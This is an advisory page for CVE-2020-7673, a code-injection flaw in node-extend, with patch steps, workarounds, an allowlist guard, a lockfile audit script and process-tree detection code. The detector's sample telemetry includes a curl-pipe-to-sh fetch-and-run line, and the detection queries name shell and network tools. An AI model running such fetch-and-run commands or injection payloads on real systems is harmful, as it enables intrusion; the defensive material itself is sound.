CVE-2020-7673

9.8 CRITICAL

📋 TL;DR

CVE-2020-7673 is an arbitrary code execution flaw in the node-extend library: when untrusted input reaches the vulnerable extend function, an attacker can run code of their choosing inside the Node.js process, with whatever privileges that process holds. It affects any Node.js application that uses node-extend at version 0.2.0 or earlier and passes externally supplied data into extend. Because the attacker reaches the function through the application's own input paths, the attack is remote and needs no prior authentication.

💻 Affected Systems

Products:
  • node-extend
Versions: All versions up to and including 0.2.0
Operating Systems: All platforms running Node.js
Default Config Vulnerable: ⚠️ Yes
Notes: The library itself has nothing to configure, so whether an application is exposed depends entirely on whether data from outside the trust boundary (request parameters, JSON bodies, headers, file contents) is passed into the affected extend parameters.

⚠️ Risk & Real-World Impact

🔴 Worst Case: Full compromise of the host running the application. Code executes with the privileges of the Node.js process, so an attacker can run arbitrary commands, read secrets and data, install malware, or pivot to other systems.

🟠 Likely Case: Remote code execution inside the application, leading to application compromise, data exfiltration, or service disruption.

🟢 If Mitigated: Limited impact if a strict allowlist at the input boundary keeps untrusted data out of the extend function and the process runs with least privilege.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires attacker-controlled input to reach the vulnerable function with specific parameters.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 0.2.1 and later

Vendor Advisory: https://github.com/justmoon/node-extend/security/advisories/GHSA-8c6p-g9qj-8ppj

Restart Required: Yes

Instructions:

1. Change the node-extend entry in package.json so that its version range only accepts 0.2.1 or later.
2. Run 'npm update node-extend' or 'yarn upgrade node-extend' and confirm that the lockfile now records 0.2.1 or later.
3. Restart your Node.js application; the old module stays loaded in memory until the process is restarted.

🔧 Temporary Workarounds

Input validation and sanitization (all platforms)

Only let values that match the exact shape extend legitimately needs (for example a plain identifier, checked against an allowlist pattern) reach the function. Blocklist-style sanitization such as stripping quotes or brackets is not sufficient for a sink that evaluates code.

Pin to the patched version (all platforms)

Force the package manager to install the patched version and record it in package-lock.json or yarn.lock:

npm install node-extend@0.2.1
yarn add node-extend@0.2.1

If node-extend is pulled in transitively by another dependency, the commands above only change your direct dependency. Use the "overrides" field in package.json (npm 8.3 and later) or "resolutions" (Yarn) to force the nested copy as well, then confirm with 'npm ls node-extend' or 'yarn why node-extend'.

🧯 If You Can't Patch

  • Put a strict allowlist at the input boundary: only values matching the exact shape extend legitimately needs (e.g. an identifier pattern) may reach it; stripping quotes or parentheses does not stop a code-evaluating sink
  • Run the Node.js process as an unprivileged user with as few tools in its environment as possible, so that code execution in the process does not become host compromise
  • Use network segmentation to isolate affected systems and limit blast radius
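The allowlist point above, as an added example. This is illustrative code written for this page, not node-extend's source: unsafeExtend is a stand-in for the class of sink this CVE belongs to (a library routine that builds JavaScript source from its arguments and evaluates it), and the exact code path inside node-extend is not reproduced here. It shows that a "sanitizer" which strips quotes and parentheses still lets a payload execute, while a strict identifier allowlist (plus a deny-list for __proto__, constructor and prototype, which matter for any extend-style merge) stops it at the boundary. The payload string is constructed for the demonstration.

```javascript
'use strict';

// Illustrative sink, NOT node-extend's code: stands in for any library
// routine that builds JavaScript source from its arguments and evaluates it.
// Shown only so the guard below has something concrete to protect.
function unsafeExtend(target, propName, value) {
  // Direct eval reads `target` and `value` from this scope; whatever is in
  // propName becomes part of the program text.
  return eval(`target.${propName} = value; target`);
}

// A typical "sanitizer": strips quotes, parentheses and backticks. It does not
// help, because statement separators and assignments need none of them.
function naiveSanitize(s) {
  return String(s).replace(/['"()`]/g, '');
}

// Allowlist: a plain JavaScript identifier, and not one of the names that
// let an extend-style merge reach Object.prototype.
const IDENTIFIER = /^[A-Za-z_$][A-Za-z0-9_$]*$/;
const DENIED = new Set(['__proto__', 'constructor', 'prototype']);

function isSafePropertyName(name) {
  return typeof name === 'string' && IDENTIFIER.test(name) && !DENIED.has(name);
}

// Boundary guard for the can't-patch case: validate, then call the sink.
// If you control the code, replace the eval-based sink with
// `target[propName] = value` and keep the same check.
function guardedExtend(target, propName, value) {
  if (!isSafePropertyName(propName)) {
    throw new TypeError(`rejected property name: ${JSON.stringify(propName)}`);
  }
  return unsafeExtend(target, propName, value);
}

// Constructed payload: no quotes or parentheses, so naiveSanitize leaves it
// intact, yet it injects a statement that runs inside the process.
const PAYLOAD = 'x = 0; globalThis.pwned = 1; target.y';

function demo() {
  delete globalThis.pwned;
  unsafeExtend({}, naiveSanitize(PAYLOAD), 42);
  const sanitizedStillExecutes = globalThis.pwned === 1;

  delete globalThis.pwned;
  let rejected = false;
  try {
    guardedExtend({}, PAYLOAD, 42);
  } catch (e) {
    rejected = e instanceof TypeError;
  }
  const guardBlockedExecution = globalThis.pwned === undefined;

  const benign = guardedExtend({}, 'color', 'red');
  return { sanitizedStillExecutes, rejected, guardBlockedExecution, benignColor: benign.color };
}
```

Call demo() to see the three outcomes side by side: the sanitized payload still sets globalThis.pwned, the guarded call throws before any code is built, and a legitimate property name passes through unchanged. The guard is a wrapper you can place in front of a library call you cannot change; it does not make the library itself safe, so it belongs at every call site that receives external data.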

🔍 How to Verify

Check if Vulnerable:

Run 'npm ls node-extend' (or 'yarn why node-extend') and read the installed version; 0.2.0 or earlier is affected. package.json only shows the declared range, not what is actually installed, and a dependency of yours may carry its own nested copy, which npm ls lists separately.

Check Version:

npm list node-extend | grep node-extend
npm ls node-extend --json
yarn why node-extend

Verify Fix Applied:

Verify installed version is 0.2.1 or later using 'npm list node-extend'.
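A lockfile check complements npm ls: it sees every installed copy, including nested ones, and needs no node_modules on the machine running it. The following is an added example, not code from this page or from the node-extend project. The two lockfiles are constructed, "some-lib" is a placeholder for any dependency that carries its own copy of node-extend, and the handling of lockfileVersion 1 (nested "dependencies") and 2/3 (flat "packages" map) follows npm's documented lockfile layout.

```javascript
'use strict';

const PACKAGE = 'node-extend';
const LAST_VULNERABLE = '0.2.0';   // per this page: all versions through 0.2.0

// Compare two dotted versions numerically (pre-release/build suffixes are
// dropped, which is fine for an "at or below X" check on a 0.x line).
function compareVersions(a, b) {
  const parse = (v) => String(v).replace(/[-+].*$/, '').split('.').map(Number);
  const pa = parse(a), pb = parse(b);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

function isVulnerableVersion(version) {
  return compareVersions(version, LAST_VULNERABLE) <= 0;
}

// Find every installed copy of `name` in a parsed package-lock.json.
// lockfileVersion 2/3: flat "packages" map keyed by node_modules path.
// lockfileVersion 1 (and 2, which carries both): nested "dependencies" tree.
function findInstalled(lock, name) {
  const hits = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (path === `node_modules/${name}` || path.endsWith(`/node_modules/${name}`)) {
      hits.push({ path, version: meta.version });
    }
  }
  const walk = (deps, prefix) => {
    for (const [dep, meta] of Object.entries(deps || {})) {
      const path = `${prefix}node_modules/${dep}`;
      if (dep === name) hits.push({ path, version: meta.version });
      walk(meta.dependencies, `${path}/`);
    }
  };
  walk(lock.dependencies, '');
  const seen = new Set();              // v2 lists each copy in both sections
  return hits.filter((h) => !seen.has(h.path) && seen.add(h.path));
}

function auditLock(lock, name = PACKAGE) {
  return findInstalled(lock, name).map((h) => ({ ...h, vulnerable: isVulnerableVersion(h.version) }));
}

// Constructed sample lockfiles (not real projects). "some-lib" stands in for
// a dependency that pulls in its own nested copy of node-extend.
const SAMPLE_LOCK_V3 = {
  name: 'demo-app', lockfileVersion: 3, requires: true,
  packages: {
    '': { name: 'demo-app', version: '1.0.0', dependencies: { 'node-extend': '^0.2.0', 'some-lib': '^1.0.0' } },
    'node_modules/node-extend': { version: '0.2.0' },
    'node_modules/some-lib': { version: '1.4.2', dependencies: { 'node-extend': '0.2.1' } },
    'node_modules/some-lib/node_modules/node-extend': { version: '0.2.1' },
  },
};

const SAMPLE_LOCK_V1 = {
  name: 'demo-app', lockfileVersion: 1, requires: true,
  dependencies: {
    'node-extend': { version: '0.2.1' },
    'some-lib': {
      version: '1.4.2',
      requires: { 'node-extend': '0.1.5' },
      dependencies: { 'node-extend': { version: '0.1.5' } },
    },
  },
};
```

Against a real project, pass JSON.parse(fs.readFileSync('package-lock.json', 'utf8')) to auditLock; every entry with vulnerable: true is a copy that the fix must cover, and a nested path tells you which dependency to override. yarn.lock is not JSON, so for Yarn projects use 'yarn why node-extend' instead.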

📡 Detection & Monitoring

Log Indicators:

  • Unexpected child processes (sh, bash, curl, wget, nc) whose parent is the Node.js application process
  • Evidence of eval() or new Function() being applied to request-derived data, where the application or an instrumentation layer logs it; Node.js does not log eval calls by itself

Network Indicators:

  • Unexpected outbound connections from the Node.js application process
  • Command and control traffic patterns

SIEM Query (field names follow this page's convention; map them to your schema):

process.name:node AND (process.cmdline:*eval* OR process.cmdline:*child_process*)

This matches only node processes whose own command line contains those strings, i.e. 'node -e'/'--eval' invocations or a child started with an inline script. Code evaluated inside an already-running application leaves nothing on the command line, so pair it with a parent-process rule, assuming a process.parent.name field:

process.parent.name:node AND process.name:(sh OR bash OR curl OR wget OR nc)
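Detection logic for the parent-process signal, as an added example that is not part of this page. The process events and their field names (ts, pid, ppid, name, cmdline) are constructed and will need mapping to your EDR or auditd schema. It applies the command-line rule to node processes and, separately, flags shells and download tools that have a node process anywhere in their ancestry, which catches the two-hop node to sh to curl chain that a parent-only query misses.

```javascript
'use strict';

// Constructed process-creation events (not real telemetry). Field names
// (ts, pid, ppid, name, cmdline) are assumptions; map them to your schema.
const SAMPLE_EVENTS = [
  { ts: '2024-05-01T10:00:00Z', pid: 4101, ppid: 1,    name: 'node', cmdline: 'node /srv/app/server.js' },
  { ts: '2024-05-01T10:00:05Z', pid: 4105, ppid: 4101, name: 'node', cmdline: 'node /srv/app/worker.js' },
  { ts: '2024-05-01T10:02:13Z', pid: 4210, ppid: 4101, name: 'sh',   cmdline: 'sh -c "curl http://198.51.100.7/x | sh"' },
  { ts: '2024-05-01T10:02:14Z', pid: 4211, ppid: 4210, name: 'curl', cmdline: 'curl http://198.51.100.7/x' },
  { ts: '2024-05-01T10:03:00Z', pid: 4300, ppid: 4101, name: 'node', cmdline: "node -e \"require('child_process').exec('id')\"" },
  { ts: '2024-05-01T10:04:00Z', pid: 4400, ppid: 900,  name: 'bash', cmdline: 'bash -l' },
];

// Rule 1: the command-line query from the page. It fires only for node
// processes started with inline code (-e/--eval/-p/--print) or with
// child_process on the command line; eval() inside a running app never shows here.
const INLINE_EVAL = /(^|\s)(-e|--eval|-p|--print)(\s|$)/;

// Rule 2: shells and download/network tools with a node process anywhere in
// their ancestry. Walking the tree catches node -> sh -> curl, which a
// parent-only query misses.
const SUSPECT_TOOLS = new Set(['sh', 'bash', 'dash', 'zsh', 'curl', 'wget', 'nc', 'ncat', 'python', 'python3', 'perl']);
const MAX_DEPTH = 8;   // bound the walk in case of pid reuse or cycles

function hasNodeAncestor(ev, byPid) {
  let cur = byPid.get(ev.ppid);
  for (let depth = 0; cur && depth < MAX_DEPTH; depth++) {
    if (cur.name === 'node') return true;
    cur = byPid.get(cur.ppid);
  }
  return false;
}

function detect(events) {
  const byPid = new Map(events.map((e) => [e.pid, e]));
  const hits = [];
  for (const ev of events) {
    if (ev.name === 'node' && (INLINE_EVAL.test(ev.cmdline) || ev.cmdline.includes('child_process'))) {
      hits.push({ pid: ev.pid, rule: 'node-inline-eval', cmdline: ev.cmdline });
    } else if (SUSPECT_TOOLS.has(ev.name) && hasNodeAncestor(ev, byPid)) {
      hits.push({ pid: ev.pid, rule: 'tool-under-node', cmdline: ev.cmdline });
    }
  }
  return hits;
}

function flaggedPids(events) {
  return detect(events).map((h) => h.pid).sort((a, b) => a - b);
}
```

On the sample, detect() flags the sh spawned by the server, the curl spawned by that sh, and the node -e invocation, while the worker started as a plain node child and the bash session under sshd stay quiet. In a streaming pipeline the pid map has to persist across a window, because a process's ancestors were reported in earlier events; tune SUSPECT_TOOLS to what the application legitimately spawns.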
